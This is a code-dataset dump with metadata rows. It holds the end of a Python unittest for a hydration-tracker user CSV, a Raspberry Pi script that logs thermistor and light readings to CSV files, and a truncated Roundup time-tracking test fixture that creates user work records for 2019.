writer = csv.writer(csv_file)
writer.writerow(example_user)
# open file, read data from file
with open(path, 'r', newline='') as csv_file:
reader = csv.reader(csv_file)
new_row = []
for row in reader:
if row[0] == example_user[0]:
new_row = row
self.assertEqual(example_user, new_row)
csv_file.close()
def test_edit_user_data(self):
# example users for testing
columns = ['card_uid', 'registration_state', 'name', 'age', 'sex', 'activity_level',
'daily_hydration_lower', 'daily_hydration_upper', 'water_dispensed', 'total_dispensed',
'percent_dispensed_of_daily', 'num_days', 'num_days_goal', 'avg_intake', 'last_login'
]
user_data = [
['734a266f', 'True', 'name one', '5', 'Male', 'Sedentary', '1400', '1600', '0', '100000', '0.0', '1', '0',
'1517.0', '20/08/2021 05:42:21'],
['5d81e96d', 'True', 'name two', '12', 'Female', 'Sedentary', '1600', '2000', '200', '200000', '20.0', '14',
'12', '1984.0', '11/07/2021 07:15:09'],
['4d71f56d', 'True', 'name three', '17', 'Male', 'Moderate', '2400', '2800', '500', '300000', '50.0', '28',
'19', '1000.0', '20/08/2021 16:58:59'],
['fdd1a46b', 'True', 'name four', '29', 'Female', 'Moderate', '2000', '2200', '1300', '400000', '130.0',
'33', '3', '0.0', '20/08/2021 24:24:24'],
['1d4ba46b', 'True', 'name five', '48', 'Male', 'Active', '2400', '2600', '1800', '500000', '180.0', '99',
'99', '2256.0', '20/08/2021 17:36:10'],
['dd8b9f6b', 'True', 'name six', '76', 'Female', 'Active', '1800', '1800', '2400', '600000', '240.0', '257',
'202', '1234.0', '01/01/1970 00:00:00']
]
# NOTE: enter the exact path for your machine to run locally
path = ''
# open file, write data to file
with open(path, 'w', newline='') as csv_file:
writer = csv.writer(csv_file)
writer.writerow(columns)
writer.writerows(user_data)
row_to_change = 0
# open file, read data from file
with open(path, 'r', newline='') as csv_file:
reader = csv.reader(csv_file)
row_num = 0
for row in reader:
if row[0] == '734a266f':
row_to_change = row_num
row_num += 1
# create pandas dataframe of the csv file, make a few changes
df = pd.read_csv(path)
df.at[row_to_change - 1, 'num_days'] += 1
df.at[row_to_change, 'water_dispensed'] += 500
df.at[row_to_change + 1, 'activity_level'] = 'Moderate'
temp_water_dispensed = df.at[row_to_change, 'water_dispensed']
temp_water_dispensed += 1000
df.at[row_to_change, 'water_dispensed'] = temp_water_dispensed
df.to_csv(path, index=False)
csv_file.close()
edited_user_data = [
['734a266f', 'True', 'name one', '5', 'Male', 'Sedentary', '1400', '1600', '0', '100000', '0.0', '2', '0',
'1517.0', '20/08/2021 05:42:21'],
['5d81e96d', 'True', 'name two', '12', 'Female', 'Sedentary', '1600', '2000', '1700', '200000', '20.0',
'14',
'12', '1984.0', '11/07/2021 07:15:09'],
['4d71f56d', 'True', 'name three', '17', 'Male', 'Moderate', '2400', '2800', '500', '300000', '50.0', '28',
'19', '1000.0', '20/08/2021 16:58:59'],
['fdd1a46b', 'True', 'name four', '29', 'Female', 'Moderate', '2000', '2200', '1300', '400000', '130.0',
'33', '3', '0.0', '20/08/2021 24:24:24'],
['1d4ba46b', 'True', 'name five', '48', 'Male', 'Active', '2400', '2600', '1800', '500000', '180.0', '99',
'99', '2256.0', '20/08/2021 17:36:10'],
['dd8b9f6b', 'True', 'name six', '76', 'Female', 'Active', '1800', '1800', '2400', '600000', '240.0', '257',
'202', '1234.0', '01/01/1970 00:00:00']
]
# open file, read data from file
with open(path, 'r', newline='') as csv_file:
reader = csv.reader(csv_file)
row_num = 0
for row in reader:
if row_num == 0:
self.assertEqual(columns, row)
else:
self.assertEqual(edited_user_data[row_num - 1], row)
row_num += 1
csv_file.close()
def test_open_write_empty_read_close(self):
# example users for testing
columns = ['card_uid', 'registration_state', 'name', 'age', 'sex', 'activity_level',
'daily_hydration_lower', 'daily_hydration_upper', 'water_dispensed', 'total_dispensed',
'percent_dispensed_of_daily', 'num_days', 'num_days_goal', 'avg_intake', 'last_login'
]
user_data = [
['', '', '', '', '', '', '', '', '', '', '', '', '', '', ''],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', ''],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', ''],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', ''],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', ''],
['', '', '', '', '', '', '', '', '', '', '', '', '', '', '']
]
# NOTE: enter the exact path for your machine to run locally
path = ''
# open file, write data to file
with open(path, 'w', newline='') as csv_file:
writer = csv.writer(csv_file)
writer.writerow(columns)
writer.writerows(user_data)
# open file, read data from file
with open(path, 'r', newline='') as csv_file:
reader = csv.reader(csv_file)
row_num = 0
for row in reader:
if row_num == 0:
self.assertEqual(columns, row)
else:
self.assertEqual(user_data[row_num - 1], row)
row_num += 1
csv_file.close()
def test_file_initialization_for_boot_up(self):
# example users for testing
columns = ['card_uid', 'registration_state', 'name', 'age', 'sex', 'activity_level',
'daily_hydration_lower', 'daily_hydration_upper', 'water_dispensed', 'total_dispensed',
'percent_dispensed_of_daily', 'num_days', 'num_days_goal', 'avg_intake', 'last_login'
]
user_data = [
['734a266f', 'False', ' ', '0', ' ', ' ', '0', '0', '0', '0', '0.0', '0', '0', '0.0', ' '],
['5d81e96d', 'False', ' ', '0', ' ', ' ', '0', '0', '0', '0', '0.0', '0', '0', '0.0', ' '],
['4d71f56d', 'False', ' ', '0', ' ', ' ', '0', '0', '0', '0', '0.0', '0', '0', '0.0', ' '],
['fdd1a46b', 'False', ' ', '0', ' ', ' ', '0', '0', '0', '0', '0.0', '0', '0', '0.0', ' '],
['1d4ba46b', 'False', ' ', '0', ' ', ' ', '0', '0', '0', '0', '0.0', '0', '0', '0.0', ' '],
['dd8b9f6b', 'False', ' ', '0', ' ', ' ', '0', '0', '0', '0', '0.0', '0', '0', '0.0', ' ']
]
# NOTE: enter the exact path for your machine to run locally
path = ''
# open file, write data to file
with open(path, 'w', newline='') as csv_file:
writer = csv.writer(csv_file)
writer.writerow(columns)
writer.writerows(user_data)
# open file, read data from file
with open(path, 'r', newline='') as csv_file:
reader = csv.reader(csv_file)
row_num = 0
for row in reader:
if row_num == 0:
self.assertEqual(columns, row)
else:
self.assertEqual(user_data[row_num - 1], row)
row_num += 1
csv_file.close()
if __name__ == '__main__':
unittest.main()
| 45.40636
| 120
| 0.481245
| 1,546
| 12,850
| 3.85705
| 0.129366
| 0.022807
| 0.027168
| 0.032199
| 0.87456
| 0.871373
| 0.866007
| 0.857622
| 0.857622
| 0.857622
| 0
| 0.154779
| 0.313697
| 12,850
| 282
| 121
| 45.567376
| 0.521374
| 0.083346
| 0
| 0.73913
| 0
| 0
| 0.285824
| 0.028931
| 0
| 0
| 0
| 0
| 0.05314
| 1
| 0.028986
| false
| 0
| 0.014493
| 0
| 0.048309
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0377ea243b69ee749031fa3206a18401ccb44a0f
| 3,470
|
py
|
Python
|
scripts_gpio/therm.py
|
BertrandFreylin/WeatherStation
|
4ab6f5af2af02a83c109ecb79498e4c92e5af5d2
|
[
"Apache-2.0"
] | null | null | null |
scripts_gpio/therm.py
|
BertrandFreylin/WeatherStation
|
4ab6f5af2af02a83c109ecb79498e4c92e5af5d2
|
[
"Apache-2.0"
] | null | null | null |
scripts_gpio/therm.py
|
BertrandFreylin/WeatherStation
|
4ab6f5af2af02a83c109ecb79498e4c92e5af5d2
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
import ADC0834
import time
import math
def setup_files(number_of_lines):
num_lines_temp = sum(1 for line in open('/home/bertrand/workspace/rasp/static/data/therm_inside.csv'))
if num_lines_temp > number_of_lines:
to_delete = int(num_lines_temp - number_of_lines)
with open('/home/bertrand/workspace/rasp/static/data/therm_inside.csv', 'r') as fin:
data = fin.read().splitlines(True)
with open('/home/bertrand/workspace/rasp/static/data/therm_inside.csv', 'w') as fout:
fout.writelines(data[to_delete:])
fin.close()
fout.close()
num_lines_photo = sum(1 for line in open('/home/bertrand/workspace/rasp/static/data/photo.csv'))
if num_lines_photo > number_of_lines:
to_delete = int(num_lines_photo - number_of_lines)
with open('/home/bertrand/workspace/rasp/static/data/photo.csv', 'r') as fin:
data = fin.read().splitlines(True)
with open('/home/bertrand/workspace/rasp/static/data/photo.csv', 'w') as fout:
fout.writelines(data[to_delete:])
fin.close()
fout.close()
return
def main(number_of_lines, date):
temp_val_raw = ADC0834.getResult(0)
Vr = 5 * float(temp_val_raw) / 255
Rt = 10000 * Vr / (5 - Vr)
temp = 1 / (((math.log(Rt / 10000)) / 3950) + (1 / (273.15 + 25)))
temp_val = round(temp - 273.15)
time.sleep(1)
lum_val = round((ADC0834.getResult(2) * -1) + 255)
weather_temp = open("/home/bertrand/workspace/rasp/static/data/therm_inside.csv", "a+")
weather_temp.write("%s,%s\n" % (date, temp_val))
num_lines_temp = sum(1 for line in open('/home/bertrand/workspace/rasp/static/data/therm_inside.csv'))
if num_lines_temp > number_of_lines:
with open('/home/bertrand/workspace/rasp/static/data/therm_inside.csv', 'r') as fin:
data = fin.read().splitlines(True)
with open('/home/bertrand/workspace/rasp/static/data/therm_inside.csv', 'w') as fout:
fout.writelines(data[1:])
weather_temp.close()
weather_temp_total = open("/home/bertrand/workspace/rasp/static/data/therm_inside_total.csv", "a+")
weather_temp_total.write("%s,%s\n" % (date, temp_val))
weather_temp_total.close()
photo = open("/home/bertrand/workspace/rasp/static/data/photo.csv", "a+")
photo.write("%s,%s\n" % (date, lum_val))
num_lines_photo = sum(1 for line in open('/home/bertrand/workspace/rasp/static/data/photo.csv'))
if num_lines_photo > number_of_lines:
with open('/home/bertrand/workspace/rasp/static/data/photo.csv', 'r') as fin:
data = fin.read().splitlines(True)
with open('/home/bertrand/workspace/rasp/static/data/photo.csv', 'w') as fout:
fout.writelines(data[1:])
photo.close()
photo_total = open("/home/bertrand/workspace/rasp/static/data/photo_total.csv", "a+")
photo_total.write("%s,%s\n" % (date, lum_val))
photo_total.close()
return
def destroy():
weather_temp = open("/home/bertrand/workspace/rasp/static/data/therm_inside.csv", "a+")
weather_temp.close()
weather_temp_total = open("/home/bertrand/workspace/rasp/static/data/therm_inside_total.csv", "a+")
weather_temp_total.close()
photo = open("/home/bertrand/workspace/rasp/static/data/photo.csv", "a+")
photo.close()
photo_total = open("/home/bertrand/workspace/rasp/static/data/photo_total.csv", "a+")
photo_total.close()
return
| 44.487179
| 106
| 0.665994
| 507
| 3,470
| 4.390533
| 0.149901
| 0.071878
| 0.143756
| 0.224618
| 0.86478
| 0.86478
| 0.86478
| 0.831536
| 0.820755
| 0.820755
| 0
| 0.020622
| 0.175504
| 3,470
| 77
| 107
| 45.064935
| 0.757427
| 0.006052
| 0
| 0.712121
| 0
| 0
| 0.338167
| 0.323086
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045455
| false
| 0
| 0.045455
| 0
| 0.136364
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
30577d70a1c1522176a05c9c572d66e6b86822a0
| 87,419
|
py
|
Python
|
test/user18_time.py
|
time-track-tool/time-track-tool
|
a1c280f32a7766e460c862633b748fa206256f24
|
[
"MIT"
] | null | null | null |
test/user18_time.py
|
time-track-tool/time-track-tool
|
a1c280f32a7766e460c862633b748fa206256f24
|
[
"MIT"
] | 1
|
2019-07-03T13:32:38.000Z
|
2019-07-03T13:32:38.000Z
|
test/user18_time.py
|
time-track-tool/time-track-tool
|
a1c280f32a7766e460c862633b748fa206256f24
|
[
"MIT"
] | 1
|
2019-05-15T16:01:31.000Z
|
2019-05-15T16:01:31.000Z
|
from roundup import date
def import_data_18 (db, user, dep, olo) :
sd = dict (months = 1.0, required_overtime = 1, weekly = 0)
otp = db.overtime_period.filter (None, sd)
assert len (otp) == 1
otp = otp [0]
db.user_dynamic.create \
( hours_fri = 7.5
, hours_sun = 0.0
, hours_wed = 7.75
, vacation_yearly = 25.0
, all_in = 0
, valid_from = date.Date ("2018-10-01.00:00:00")
, durations_allowed = 0
, hours_tue = 7.75
, supp_per_period = 7.0
, weekend_allowed = 0
, hours_mon = 7.75
, hours_thu = 7.75
, vacation_day = 1.0
, booking_allowed = 1
, valid_to = date.Date ("2019-05-01.00:00:00")
, weekly_hours = 38.5
, travel_full = 0
, vacation_month = 1.0
, hours_sat = 0.0
, department = dep
, org_location = olo
, overtime_period = otp
, user = user
, vac_aliq = '1'
)
sd = dict (months = 0.0, required_overtime = 0, weekly = 1)
otp = db.overtime_period.filter (None, sd)
assert len (otp) == 1
otp = otp [0]
db.user_dynamic.create \
( hours_fri = 7.5
, hours_sun = 0.0
, additional_hours = 38.5
, hours_wed = 7.75
, vacation_yearly = 25.0
, all_in = 0
, valid_from = date.Date ("2019-05-01.00:00:00")
, durations_allowed = 0
, hours_tue = 7.75
, weekend_allowed = 0
, hours_mon = 7.75
, hours_thu = 7.75
, vacation_day = 1.0
, booking_allowed = 1
, supp_weekly_hours = 38.5
, valid_to = date.Date ("2019-12-01.00:00:00")
, weekly_hours = 38.5
, travel_full = 0
, vacation_month = 1.0
, hours_sat = 0.0
, department = dep
, org_location = olo
, overtime_period = otp
, user = user
, vac_aliq = '1'
)
vcorr = db.vacation_correction.create \
( user = user
, date = date.Date ('2018-01-01.00:00:00')
, absolute = 1
, days = 7.765
)
ls = db.leave_submission.create \
( user = user
, first_day = date.Date ('2019-05-20.00:00:00')
, last_day = date.Date ('2019-05-20.00:00:00')
, status = '4'
, time_wp = '44'
)
ls = db.leave_submission.create \
( user = user
, first_day = date.Date ('2019-06-28.00:00:00')
, last_day = date.Date ('2019-06-28.00:00:00')
, status = '4'
, time_wp = '44'
)
ls = db.leave_submission.create \
( user = user
, first_day = date.Date ('2019-07-05.00:00:00')
, last_day = date.Date ('2019-07-05.00:00:00')
, status = '4'
, time_wp = '44'
)
ls = db.leave_submission.create \
( user = user
, first_day = date.Date ('2019-08-09.00:00:00')
, last_day = date.Date ('2019-08-16.00:00:00')
, status = '4'
, time_wp = '44'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-01.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, duration = 7.75
, work_location = '5'
, wp = '1'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-02.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '4'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-03.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '4'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-04.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-05.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-06.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '15:00'
, work_location = '1'
, wp = '5'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '1'
, wp = '5'
)
db.time_record.create \
( daily_record = dr
, start = '15:00'
, end = '16:00'
, work_location = '1'
, wp = '6'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-07.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '14:30'
, work_location = '1'
, wp = '4'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '1'
, wp = '5'
)
db.time_record.create \
( daily_record = dr
, start = '14:30'
, end = '16:00'
, work_location = '1'
, wp = '7'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-08.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '14:00'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '10:00'
, work_location = '1'
, wp = '7'
)
db.time_record.create \
( daily_record = dr
, start = '10:00'
, end = '12:00'
, work_location = '1'
, wp = '8'
)
db.time_record.create \
( daily_record = dr
, start = '14:00'
, end = '16:00'
, work_location = '1'
, wp = '7'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-09.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '14:00'
, work_location = '1'
, wp = '4'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '11:30'
, work_location = '1'
, wp = '5'
)
db.time_record.create \
( daily_record = dr
, start = '11:30'
, end = '12:00'
, work_location = '1'
, wp = '7'
)
db.time_record.create \
( daily_record = dr
, start = '14:00'
, end = '16:00'
, work_location = '1'
, wp = '5'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-10.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '15:00'
, work_location = '2'
, wp = '5'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-11.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-12.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-13.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '5'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '5'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-14.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '17:00'
, work_location = '2'
, wp = '5'
)
db.time_record.create \
( daily_record = dr
, start = '08:30'
, end = '12:00'
, work_location = '2'
, wp = '5'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-15.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '08:15'
, end = '08:45'
, work_location = '2'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '5'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '11:00'
, work_location = '1'
, wp = '5'
)
db.time_record.create \
( daily_record = dr
, start = '16:15'
, end = '16:45'
, work_location = '2'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '11:00'
, end = '12:00'
, work_location = '1'
, wp = '6'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-16.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '14:00'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '14:00'
, end = '16:00'
, work_location = '1'
, wp = '5'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-17.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '6'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-18.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-19.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, duration = 7.75
, work_location = '5'
, wp = '44'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-21.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '17:30'
, work_location = '2'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '09:30'
, end = '10:30'
, work_location = '2'
, wp = '5'
)
db.time_record.create \
( daily_record = dr
, start = '10:30'
, end = '11:30'
, work_location = '2'
, wp = '4'
)
db.time_record.create \
( daily_record = dr
, start = '11:30'
, end = '12:00'
, work_location = '2'
, wp = '6'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-22.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:30'
, work_location = '2'
, wp = '9'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '11:00'
, work_location = '2'
, wp = '9'
)
db.time_record.create \
( daily_record = dr
, start = '11:00'
, end = '12:00'
, work_location = '2'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '16:30'
, end = '17:00'
, work_location = '2'
, wp = '10'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-23.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '9'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '9'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-24.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '14:30'
, work_location = '1'
, wp = '11'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '11'
)
db.time_record.create \
( daily_record = dr
, start = '16:15'
, end = '16:45'
, work_location = '2'
, wp = '4'
)
db.time_record.create \
( daily_record = dr
, start = '15:30'
, end = '16:00'
, work_location = '1'
, wp = '4'
)
db.time_record.create \
( daily_record = dr
, start = '14:30'
, end = '15:30'
, work_location = '1'
, wp = '9'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-25.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-26.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-27.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '14:00'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '9'
)
db.time_record.create \
( daily_record = dr
, start = '14:00'
, end = '16:00'
, work_location = '1'
, wp = '9'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-28.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '2'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '09:30'
, end = '12:00'
, work_location = '2'
, wp = '9'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-29.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '1'
, wp = '6'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-30.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, duration = 7.75
, work_location = '5'
, wp = '1'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-05-31.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '11:00'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '11:00'
, end = '12:00'
, work_location = '1'
, wp = '12'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-01.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-02.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-03.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '15:30'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '11:00'
, work_location = '1'
, wp = '4'
)
db.time_record.create \
( daily_record = dr
, start = '11:00'
, end = '12:00'
, work_location = '1'
, wp = '13'
)
db.time_record.create \
( daily_record = dr
, start = '15:30'
, end = '16:00'
, work_location = '1'
, wp = '13'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-04.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '09:30'
, end = '13:30'
, work_location = '2'
, wp = '13'
)
db.time_record.create \
( daily_record = dr
, start = '13:30'
, end = '15:30'
, work_location = '2'
, wp = '6'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-05.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '15:30'
, work_location = '1'
, wp = '13'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '13'
)
db.time_record.create \
( daily_record = dr
, start = '15:30'
, end = '17:00'
, work_location = '1'
, wp = '6'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-06.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '15:30'
, work_location = '1'
, wp = '13'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '13'
)
db.time_record.create \
( daily_record = dr
, start = '15:30'
, end = '16:30'
, work_location = '1'
, wp = '4'
)
db.time_record.create \
( daily_record = dr
, start = '16:30'
, end = '17:00'
, work_location = '1'
, wp = '6'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-07.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '6'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-08.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-09.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-10.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, duration = 7.75
, work_location = '5'
, wp = '1'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-11.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '1'
, wp = '6'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-12.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '15:00'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '15:00'
, end = '16:00'
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-13.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '15:00'
, work_location = '2'
, wp = '6'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-14.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '6'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-15.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-16.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-17.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
